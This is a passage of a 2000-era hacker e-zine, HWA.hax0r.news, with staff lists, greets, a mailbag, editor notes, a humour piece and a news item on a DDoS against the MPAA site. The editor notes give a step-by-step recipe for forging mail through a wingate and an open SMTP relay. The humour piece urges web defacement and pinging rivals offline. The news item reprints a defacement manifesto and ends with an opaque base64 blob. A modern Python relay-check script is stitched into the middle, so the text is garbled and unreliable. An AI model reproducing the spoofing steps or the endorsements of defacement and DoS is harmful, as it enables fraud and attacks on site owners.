 - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc

If you still can't think of anything you're probably not that interesting a
person after all so don't worry about it

Our current email:

  Submissions/zine gossip.....: cruciphux@dok.org
  Private email to editor.....: cruciphux@dok.org
  Distribution/Website........: sas2@usa.net

Other methods:

  Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use
  for lame questions!
  My Preferred chat method: IRC Efnet in #HWA.hax0r.news

@HWA

00.2 THIS IS WHO WE ARE
     ~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  cruciphux@dok.org.........: currently active/editorial
  darkshadez@ThePentagon.com: currently active/man in black
  fprophet@dok.org..........: currently active/programming/IRC+ man in black
  sas2@usa.net .............: currently active/IRC+ distribution
  vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
  dicentra...(email withheld): IRC+ grrl in black
  twisted-pair@gmx.net......: currently active/programming/IRC+
  pyra......................: currently active/crypto queen

Foreign Correspondents/affiliate members (Active)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Qubik ............................: United Kingdom
  D----Y ...........................: USA/world media
  Zym0t1c ..........................: Dutch/Germany/Europe
  Sla5h.............................: Croatia
  Spikeman .........................: World Media/IRC channel enforcer
  Armour (armour@bur.st)............: Australia
  Wyze1.............................: South Africa
  Xistence..........................: German/Dutch translations

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  N0Portz ..........................: Australia
  system error .....................: Indonesia
  Wile (wile coyote) ...............: Japan/the East
  Ruffneck ........................: Netherlands/Holland

Please send in your sites for inclusion here if you haven't already, also if
you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will
be posted here.

  http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

  Sla5h's email: smuddo@yahoo.com

*******************************************************************
***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count
   paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent
   news events its a good idea to check out issue #1 at least and possibly
   also the Xmas 99 issue for a good feel of what we're all about otherwise
   enjoy - Ed ...

@HWA

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd like
to see more reader input, help me out here, whats good, what sucks etc, not
that I guarantee i'll take any notice mind you, but send in your thoughts
anyway.

New members/affiliates

  Xistence  ..... General news and Dutch/German translations
  sP|a|Zm   ..... Swedish news / translations
  SugarKing ..... General news articles

* all the people who sent in cool emails and support

GREETS
~~~~~~

FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs* Spikeman p0lix
Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik
gov-boi _Jeezus_ Haze_ theduece ytcracker loophole BlkOps MostHated
vetesgirl Slash bob- CHEVY* Debris pr1zm JimJones Dragos Ruiu pr0xy MR^CHAOS
senn Fuqrag Messiah v00d00 meliksah dinkee omnihil sP|a|Zm OE KillNow iPulse
erikR prizm paluka Xistence doobee phold hi ;) {} mixter merXor abattis
ashie diesl0w aus Julien/Csoft b0f chappies DoK chappies and our HWA clan

DISSES?
~~~~~~~

You get the biggest dis of them all, your name(s) will not even be mentioned
here in the zine, you are nothing. You know who you are, deal and squeal.

EoF

shouts to Xochitl13 for sending the cool postcard with a pic of the la 2600
meeting place. cheers dude! btw your mailbox is full ...

Folks from #hwa.hax0r.news and other leet secret channels, *grin* - mad
props! ... ;-)

And many others, sorry if i missed you or forgot you!
mail me and i'll flail myself unforgivingly in front of my open bedroom
window until I bleed, then maybe, add u to the list (please, don't ask for
pics...)

Also mad props to doobee and the CCC (Chaos Computer Club) in Germany for
setting up a new listserv system to help distribute the zine. (Will be in
action soon, I have admin work to do first and testruns..). :-)))

  Ken Williams/tattooman ex-of PacketStorm,
  SpaceRogue for running a kick ass news net
  Emmanuel Goldstein for pure staying power
  All the crackers, hackers and phreakers
  The sysadmins, NOC controllers, network engineers
  IRCops, security professionals, tiger team operatives
  military cyberwar grunts, feds and 'special computer unit' coppers
  trying to keep shit together in this anarchic chaos.

  AND

  Kevin Mitnick (free at last, stay free this time man...)

Kevin was released from federal prison on January 21st 2000, for more
information on his story visit http://www.freekevin.com/
Not familiar with his story? You should be, it affects us all especially if
you're in the U.S

-=-

kewl sites: Updated May/Jun 2000

Placement on list has no bearing of how "kewl" the sites are. :-p

 + http://hackdesk.dhs.org/
 + http://www.hack.co.za/ ** may be up, may be down... **
 + http://blacksun.box.sk/
 + http://packetstorm.securify.com/
 + http://www.securityportal.com/
 + http://www.securityfocus.com/
 + http://www.hackcanada.com/
 + http://www.freekevin.com/
 + http://www.genocide2600.com/
 + http://www.hackernews.com/ (Went online same time we started issue 1!)
 + http://www.net-security.org/
 + http://www.slashdot.org/
 + http://www.freshmeat.net/
 + http://www.403-security.org/
 + http://www.pure-security.net/
 + http://ech0.cjb.net/
 + http://www.r00tabega.com/
 + http://eeye.com/
 + http://ussrback.com/
 + http://el8.org/
 + http://adm.freelsd.net/
 + http://www.l0pht.com/
 + http://www.2600.com/

@HWA

01.1 Last minute stuff, rumours and newsbytes
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always
 popular..." - FProphet '99

Since we provide only the links in this section, be prepared for 404's - Ed

+++ When was the last time you backed up your important data?

 ++ www.hack.co.za is back online (see elsewhere for story on gov-boi and a
    tussle with phonic) (June 2000)

    #darknet is current 'official' hack.co.za public IRC channel, it is
    generally open on EFnet, but sometimes closed due to attacks from lamers
    with nothing better to do than disrupt IRC.

Thanks to myself for providing the info from my wired news feed and others
from whatever sources, Zym0t1c and also to Spikeman for sending in past
entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

*** NEW WEB BOARD! ***

========================================================================

The message board has been REVIVED with a new script and is doing quite
well. Check it out http://discserver.snap.com/Indices/103991.html .

Don't be shy with your email, we do get mail, just not much of it directed
to other readers/the general readership. I'd really like to see a 'readers
mail' section. Send in questions on security, hacking IDS, general tech
questions or observations etc, hell we've even printed poetry in the past
when we thought it was good enough to share.. - Ed

=======================================================================

* From the Web board: *
~~~~~~~~~~~~~~~~~~~~~~~~

(Didn't pull much from the board, check it out, some interesting stuff on
there... - Ed)

rst-: drskru@gmx.net
New Group SKRU for YOU!
Sun May 21 17:27:36 2000

New group now recruiting! Fun hax0r group :)) must have a sense of humour
will skewl. http://skru2k.tripod.com/skru/ EFnet #Script-Kids-R-Us :-)
See ya there, keep up the cool zine! bye....

-=-

note: this group has defaced several sites and mirrors can be seen on
Attrition.org, also channel is keyed. - Ed

-=-

A little late unfortunately but for your ref; - Ed

Lucian: lucjam@mindspring.com
TV film on script kiddies
Wed May 17 15:26:27 2000

Hi HWA,

Am working on a big new film about kid hackers / crackers / script kiddies
for British TV. Treating them not as anti-corporate heroes, or geniuses, but
as willful, cat burgling pranksters. I need to find some contacts for
hackers (and their admirers!) before the end of this week... This isn't some
lame documentary exposing people, this is a cool story, not a news expose,
happy for anyone to be anonymous. Am on to all the usual suspects, but any
new stories leads would be really appreciated.

thanks
Lucian

-=-

Unfortunately I didn't respond to this fella, I wonder who the 'usual
suspects' were ... hrm - Ed

-=-

SugarKing: sugarking2001@hotmail.com
2600 going too far?
Mon May 8 11:04:30 2000

2600 registers verizonREALLYsucks.com going after Verizon Wireless. And
before this fucknbc.com ? What are they trying to prove? Anyone have
anything to say about this? I'm thinking of writing an article about
it...give me some feedback.

SugarKing

-=-

allnet33
2600 going too far
Tue Jun 6 22:23:45 2000

I think 2600 is trying to challenge corporate america every chance they get.
They want to cause political trouble just to keep things stirred up so that
they have something to write about.

-=-

Check board for other threads. Open up a convo...

@HWA

02.0 Words from the editor.
     ~~~~~~~~~~~~~~~~~~~~~

#include <stdio.h>

int main(void)
{
    printf("Read commented source!\n\n");

    /* Its mostly been said in the two listbot mailing list news
     * announcement msgs, however i'd like to point out that some
     * items may fall outside the stated coverage period due to
     * threading, these were left for clarity.
     *
     * I'd like to thank staff members and especially Pyra and
     * Merxor, SugarKing, TP for their great help in getting this
     * issue and #54 into shape, thanks guys!
     *
     * Also thanks to {}, JimJones, Slash and Prizm for other
     * help and direction. *wink wink*
     *
     * Cruci-
     *
     * cruciphux@dok.org
     * Preferred chat method: IRC Efnet in #HWA.hax0r.news
     *
     */

    printf("EoF.\n");
    return 0;
}

Snailmail:

  HWA NEWS
  P.O BOX 44118
  370 MAIN ST. NORTH
  BRAMPTON, ONTARIO
  CANADA
  L6V 4H5

Anonymous email:

  telnet (wingate ip) (see our proxies list)
  Wingate>0.0.0.0
  Trying 0.0.0.0...
  Connected to target.host.edu
  Escape character is '^]'.
  220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST)
  HELO bogus.com
  250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you
  MAIL FROM: admin@nasa.gov
  250 admin@nasa.gov... Sender ok
  RCPT TO: cruciphux@dok.org
  250 cruciphux@dok.org... Recipient ok
  DATA
  Secret cool infoz
  .
  QUIT

If you got that far everything is probably ok, otherwise you might see

  550 cruciphux@dok.org... Relaying denied

or

  550 admin@nasa.gov... Domain must exist

etc.
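The two 550 replies above are what a mail server's sender check and relay check produce. As an added example (not part of the original zine), this Python sketch replays the session's envelope commands through such checks and records every rejection; the local domain list, the trusted network, the client addresses and the set standing in for a DNS lookup are constructed assumptions.

```python
import ipaddress

# Constructed assumptions for this sketch (none of these come from the zine):
LOCAL_DOMAINS = {"target.host.edu"}                      # domains this server delivers for
TRUSTED_NETS = [ipaddress.ip_network("192.0.2.0/24")]    # clients that may relay outward
RESOLVABLE = {"nasa.gov", "dok.org", "target.host.edu"}  # stands in for a DNS lookup

# Envelope commands taken from the session quoted above.
SESSION = [
    "HELO bogus.com",
    "MAIL FROM: admin@nasa.gov",
    "RCPT TO: cruciphux@dok.org",
    "DATA",
    "QUIT",
]


def domain_of(address):
    """Return the lower-cased domain of an envelope address, or None if malformed."""
    local, at, domain = address.strip().strip("<>").rpartition("@")
    if not at or not local or not domain or " " in domain:
        return None
    return domain.lower()


def domain_exists(domain):
    """Stand-in for the server's DNS check on the sender domain."""
    return domain in RESOLVABLE


def may_relay(client_ip, rcpt_domain):
    """Relay rule: mail for local domains is accepted from anyone, mail for
    any other domain only from trusted client networks."""
    if rcpt_domain in LOCAL_DOMAINS:
        return True
    ip = ipaddress.ip_address(client_ip)
    return any(ip in net for net in TRUSTED_NETS)


def replay(client_ip, commands):
    """Run SMTP envelope commands through the sender and relay checks.

    Returns (replies, audit): one (code, text) reply per command and one
    audit line per rejected MAIL FROM / RCPT TO.
    """
    replies, audit = [], []
    sender, recipients = None, []
    for line in commands:
        upper = line.strip().upper()
        arg = line.partition(":")[2].strip()
        if upper.startswith("HELO"):
            reply = (250, "Hello, pleased to meet you")
        elif upper.startswith("MAIL FROM:"):
            dom = domain_of(arg)
            if dom is None or not domain_exists(dom):
                reply = (550, f"{arg}... Domain must exist")
            else:
                sender, reply = arg, (250, f"{arg}... Sender ok")
        elif upper.startswith("RCPT TO:"):
            dom = domain_of(arg)
            if sender is None:
                reply = (503, "Need MAIL before RCPT")
            elif dom is None:
                reply = (553, f"{arg}... Malformed address")
            elif may_relay(client_ip, dom):
                recipients.append(arg)
                reply = (250, f"{arg}... Recipient ok")
            else:
                reply = (550, f"{arg}... Relaying denied")
        elif upper == "DATA":
            reply = (354, "Enter mail") if recipients else (503, "Need RCPT (recipient)")
        elif upper == "QUIT":
            reply = (221, "closing connection")
        else:
            reply = (500, "Command unrecognized")
        replies.append(reply)
        # Rejected envelope commands are what ends up in the server's log.
        if reply[0] >= 500 and upper.startswith(("MAIL FROM:", "RCPT TO:")):
            audit.append(f"client={client_ip} cmd={line!r} reply={reply[0]} {reply[1]}")
    return replies, audit


if __name__ == "__main__":
    for ip in ("203.0.113.7", "192.0.2.10"):   # untrusted proxy vs. trusted host
        replies, audit = replay(ip, SESSION)
        print(ip, [code for code, _ in replies], audit)
```

The same session is accepted from the trusted network and refused from the proxy address, and the refusal leaves an audit line naming the connecting client rather than the forged sender.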
* This won't work on a server with up to date rule sets denying relaying and
  your attempts will be logged so we don't suggest you actually use this
  method to reach us, its probably also illegal (theft of service) so, don't
  do it. ;-)

-=-

Recent public posts to listbot mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Jun 13 2000 21:25:48 EDT
From: HWA.hax0r.news
Subject: NEWS: HWA.hax0r.news is ALIVE!

Hi folks;

My apologies for the delay this time around, personal problems and other
work commitments have kept me from my hobby. This is being remedied and
things should pick up from here on in as we get organized.

Here is some news for you. HWA-security.net has been registered and will be
hosted by our good friends at Csoft (cheers Julien), check www.csoft.net for
your hosting/vhost needs. They know their shiat. Site is under development
and will be online soon.

Once again we're looking for new staff members or volunteers to act as
reporters, interviewers, news gatherers, file finders etc. More details in
release #53 which will be released this weekend June 18th.

---> Email me at cruciphux@dok.org

** Issue #53 will be released June 18th and will cover material and
   submissions from April 9th thru May 7th 2000.

** Issue #54 MAY be out this weekend also but I doubt it..we'll see how busy
   things get around here, #54 will contain the recent news and cover May
   7th to present (release date).

I will try my best to get #53 and #54 out close to each others release
dates, i'm doing it this way to maintain coverage period per issue number.

From: HWA.hax0r.news
Subject: NEWS part 2: HWA.hax0r.news

HWA.hax0r.news - http://welcome.to/HWA.hax0r.news/

Hi again,

We appreciate your staying with us and giving us support, although I'm
largely doing this for selfish reasons and fun it is nice to hear others
getting off on it too, I've decided to expand operations and offer more to
the community. I've decided to become more organized and have taken on a
staff to help with the production of the zine with an eye to keeping a more
timely release date and more reliable/quality production.

If you can help send me an email with a mini resume listing your talents and
areas you would be interested helping in.

** This is a non-profit venture. Sponsored by CUBESOFT. **

Yes we're doing it all for fun, like the old days :)

Many areas are open for you to offer help, think of this as a fresh startup,
what is it? a cross between Securityfocus, HNN, PacketStorm and the like.
Sponsors are welcome, your donations or ads will be redirected into the
development of this project.

HWA-Security.net - Web site development, design, CGI, forums programming,
administration, forum admin, mailing list admin, PHP programming, java to
proofreading and data collection.

Email me at cruciphux@dok.org with what you think you can do to help or are
interested in becoming a sponsor for this worthwhile cause.

Mailing Address:

  HWA NEWS
  P.O BOX 44118
  370 MAIN ST. NORTH
  BRAMPTON, ONTARIO
  CANADA
  L6V 4H5

SPONSORS, Commercial Advertising, Conference.
=============================================

Contact me for product advertising, or sponsorship details/offers and we can
work something out. I don't gouge and am looking to work towards financing a
new Canadian Con. CanCon 99 failed due to lack of sponsorship/expertise in
1999, if you can help or offer sponsorship, I want to hear from you.

Cruciphux@dok.org

Talk to us live
===============

Drop off news or just hang and idle or chat, don't forget to join us on
EFNet IRC #HWA.hax0r.news, if channel has a key then ..

  /join #hwa.hax0r.news zwen

(key is zwen and if that does not work msg cruciphux, i'm usually online
most days.)

Qualifications?
===============

I don't claim to know it all or be a mad skewled expert but am a 35 yr old
"old school" ex-hacker, currently certified Unix Admin, Linux Admin and
Internet Security Specialist...
information doesn't necessarily want to be $7.15

Cheers

Cruciphux, (Steve Carpenter)
HWA Editor/Founder, DoK, b0f
b0f security http://b0f.freebsd.lublin.pl/

=-=

Congrats, thanks, articles, news submissions and kudos to us at the main
address: cruciphux@dok.org complaints and all nastygrams and mailbombs can
go to /dev/null, nukes, synfloods, trinoo and tribe or ol' papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

-= start =--= start =--= start =--= start =--= start =--= start =--= start

03.0 Hacking your way into a girlie's heart, etc by: ch1ckie
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

04/09/00

[g0at] http://www.goat-advisory.org [g0at]

-=g0at media productions=-

((Hacking your way into a girlie's heart, etc))-((by: ch1ckie))

->Lesson One: Making Yourself Appear More Elite Than You Actually Are.

-In real life, or on IRC, the most important thing that a girlie looks for
 in a hax0r is skill (she hopes it will move her up in the world), whether
 it is real skill (which is hard to come by these days) or if it's simply an
 elite host (hax0r@fbi.gov).

-To make yourself appear more elite than you actually are (or ever will be),
 the first step is getting yourself an elite host (2845818@shellyeah.org
 probably won't cut it), either by means of a shell, wingate, or bnc (and if
 you don't know of these things, just tell the girl you admin some big
 network in your spare time and i'm sure she'll be impressed).

-In all retrospect, most girlies don't know the difference between _you_ and
 the real thing, so don't worry.

-Opposing popular use...to the majority of girlies, it is best not to use
 leet speak (eye 4m 4 m45t0r hax0r); this will more often than not end up
 confusing them and leave them bewildered. Thus, trying to impress them will
 prove useless. If you happen to have a girl that knows 'leet speak', don't
 directly use this speak with her either, but use it when she is in the
 premises ("y0 m4ng, u b3tt4 ch3ck y0s3lf b4 u wr3ck y0s3lf"). This will
 undoubtedly make you appear more elite/phearful than you actually are.

-For those of you who are more 'skilled', deface webpages in the fair name
 of your girlie... ("U R 0wned; mad props to my girlie"). This is a concept
 far beyond most girlies, and seeing their name on www.yahoo.com proves very
 impressive.

A few other methods of making yourself appear elite:

-obtaining operator status in as many channels as possible, do whatever you
 can to do so... suck dick, kiss ass, or stomp on some heads.

-pinging out her enemies on command will impress/delight her enough to have
 even cyber sex with you... might wanna keep that in mind.

-using random 'big' words such as "heuristic control algorithm" or
 "pleisiochronous communications" will be sure to impress... they do not
 even have to be in an order that makes any sense. As long as your girlie
 hears 'big important words', she will believe that you are elite...and the
 sad part is, that you will probably believe that you are too :(.

*Making yourself appear more elite than you actually are, is the first step
 to hacking your way into a girlie's heart. Lesson two and three coming soon
 ('Making Your Girlie Feel Important', and 'Understanding Your Girlie').*

[Shouts to my 'elite' gang in ftg ....Debris, nerp, potus, omega44,
 JimJones, and all the rest.]

"If only i could be as cool as you."
 - Silverchair

ch1ckie@ EFNet
ch1ckie.cjb.net
ch1ckie@hotmail.com

@HWA

04.0 [HWA] MPAA Site DoS'd off the net
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 12th 2000

By: Cruciphux
Source: Anonymous (one of the persons involved contacted us directly on IRC)
Data: confirmed

http://www.mpaa.org has been down for nine hours or so as I write this,
several T1's were employed in a distributed DoS attack against the site,
further information will be posted as I get it. It is also rumoured that
many sites affiliated with MPAA such as Tristar will also be going down over
the next week.

Some recent anti-MPAA defacements follow, the first site includes the full
UUencoded source code to DeCSS, (This site was censored by Attrition for
fear of reprimand from the MPAA, I believe this is a first for Attrition in
censoring defaced pages. - Ed)

http://www.safemode.org/mirror/2000/04/11/courtavenue_com/

...

fuck censorship!

a focus on MPAA(sic).

You know one thing I am really brassed off about, and it has been going on
since so-called "civilisation" existed. Is how censorship is controlling our
lives. Governments control people by the millions through forced religions,
cults, and conspiracies while ripping us off in the process. Enterprises and
Government work hand in hand to exploit the common people. Enterprises use
Government as a tool to uphold censorship and inevitably generate revenue
for them, and likewise for the government as they reap the taxes in
return (that's why the US government won't take their finger out of their
ass, and split up Microsoft and other overbloated monopolies which are very
unethical with their business strategies). Hmm, I know what you're thinking
"Isn't the idea of a 'democratic' government supposed to let the common
people control their government, not the other way around?!?", yeah and
you're completely right .... fascism is still commonplace even today in 1st
world countries.

Which brings me to the attention of MPAA (Motion Picture Association of
America) who are trying to control how we watch DVD's, where we watch them,
who we watch them with (does this include pets such as dust mites?!?), and
what parts we watch. For example "Are we allowed to skip their brainwashing
advertisements and other shit for which they want to control us with?". I
feel paranoid when I have a friend watching a DVD with me just in case I am
breaking the law. LOL! :/. Where does censorship end?! It's all DEEPLY
psychological you know! MPAA have restrained the right for people to write
drivers for no computer operating system other than Microsoft's very own
"Windows" range, this means that you have to lose your precious uptimes of
months on your unix systems for a few hours of entertainment (hardly seems
worth it).

"...and remember all visionaries are fascist bastards!" - ScrewLoose

Shouts go to... BlazinWeed, phov0s/datawar, and other nigguhs who inspired
me.

Here is the DeCSS code

This version of the code is for M$ Windows and is in the form of a
".dll" (dynamic link library). It can decrypt any information stored on
every DVD CD, yes it's the code that MPAA don't want anyone just to pass it
on OR EVEN LINK TO IT!!?!? I am deadly serious. It makes you think "What are
those mother fuckers got to hide?". You could probably find a uu base64
decoder at davecentral for both Windows and Linux (if your distribution
doesn't come with a version already). See for yourself...

.
.

N.B. It is advised to rip this code straight from the HTML source to ensure
that it is decoded 100% properly.
------------ CUT HERE (filename = "decss.zip") -------------
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 
